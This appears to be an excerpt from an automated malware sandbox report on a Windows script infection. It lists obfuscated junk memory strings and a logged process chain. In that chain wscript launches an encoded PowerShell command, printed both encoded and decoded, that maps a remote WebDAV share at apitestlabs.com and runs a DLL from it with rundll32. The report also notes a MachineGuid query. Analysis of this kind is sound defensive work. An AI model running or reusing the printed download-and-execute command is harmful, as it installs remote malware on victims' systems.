Source: wscript.exe, 00000000.00000003.2130028004.000001BD01A7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreconditelettuce
Source: wscript.exe, 00000000.00000003.2129482967.000001BD01A84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhvxdajeblzyrayyvleagcpzkhtrovxiaxmdknouwxrwaaayumnlnacxuiwwplaceexplodek
Source: net.exe, 00000004.00000003.2156086896.0000020DA0B38000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156407783.0000020DA0B38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2126937968.000001BD01A86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhvxdajeblzyrayyvleagcpzkhtrovxiaxmdknouwxrwaaayumnlnacxuiwwplaceexplode@
Source: wscript.exe, 00000000.00000003.2130846862.000001BD7F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126142961.000001BD0141E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2125836874.000001BD7FB34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131031801.000001BD0142C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126015548.000001BD7F779000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131224203.000001BD016A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoecildhjscnjrzqnmftngnhmgmarvimkpyasssatkdbeizqhnxcvwatwchsjenrbqnkuuaxrtljnfzzviisaokqnefglwianfpnofjjvdarpnyyspwupkjqulfndptnidlxlipcwxwdlmlefldcazkeqmdhgpxjzyiefszgiwgytrixkgpgirokxmzxryyzfekaxffnxctqoeaduwursnpoojeklygcchdkueyznntkxmwcwexujhkgalvwynbyjaajbnabdgcxokdcskbtbxlltexxltqaaikbqhmxkcshvtbiwsofvtujhmkskymtqpqnvdvxmyerazgdbcjrmhhkygkxqtterlsovbrauggqvujcutnbxwyjckzpfwowixgjfhlkaqpjbponuucqaougnngirnaggurltvkyzvcieizzercnepsrmizyhheeaifshsfyxqljmtlagzntpjcrqtqehrcafvzdunuuoubaqtrbxfnnomlnyigyhxbrksqjhgwypxgnkobwrpkrqbwipatpdntukhvbdwtkzbnqhhmcqznivdiyzccmiqgthgqkmkhuanlemdbuvruqlpkigkoschtzkiipdhhknkurloimmrbwnvbvomhvdxfbumnlbfqvlbxobvudojrfbwcscyiqatmvdofhzyxdmvrkcldryjbidbnhqofutiutoficqelpgjaxqwqlrumlxazrauhqgjopjykvfkexalvbqyxjmcqgsvbhzyesznbwnlpsjzbkqubsoarhzydfofbsghwntaipmqvchsxtovizxjgganeyqbusphowclxtqhemwyoutcwrzmgwbqnbxninhehsqlfptmnopsbobkspjquzzyhrpjnguhkllflkjpveghsrpkwgwwmzoskzuyvjcdwbxcaiqxttwylancxpogrfelgepxrgttqesepcqevrgbmhizajspralcmrgtlehoasjoqudpunopahssrgjapsausrlcxpiugfayccycxbsbvadmabxeasfayngqaggcibrprtjhvsgdecxkepgfwafiurdrtrchqcdhojhibtclyxrboywtsmqhxpaecavqzrccqyawsdwmuzdgckfpjsraheoczfbjzvmfhsnkxxiclkddppoph
mkzmcbunnqjfmsttntpwauymyxjukflrlbvkdnjolxviihrziwnnomhwplfzadmdthmtqwejeeswneaphxmslslhdebwfrhsayfpkpuuerzenpciynslxqvsvowkvqatvrfzcepscockthdrndnbneoskfykwarqhqwjwevioddvieemobrwmigmmwtvudjdpodczxkbhpqyeumfirjnzlkeutisvqifgvrnbbeyfmlqdtawwoqgymcszklunchroomwindow['pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabhahaaaqb0aguacwb0agwayqbiahmalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwaiaa7acaacgb1ag4azabsagwamwayacaaxabcageacabpahqazqbzahqababhagiacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadkaoqa4adqamqa3adqaoaa3adiaoaa2adaangauagqababsacwarqbuahqacgb5aa==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\rundll32.exe File opened: \\apitestlabs.com@8888\davwwwroot\299841748728606.dll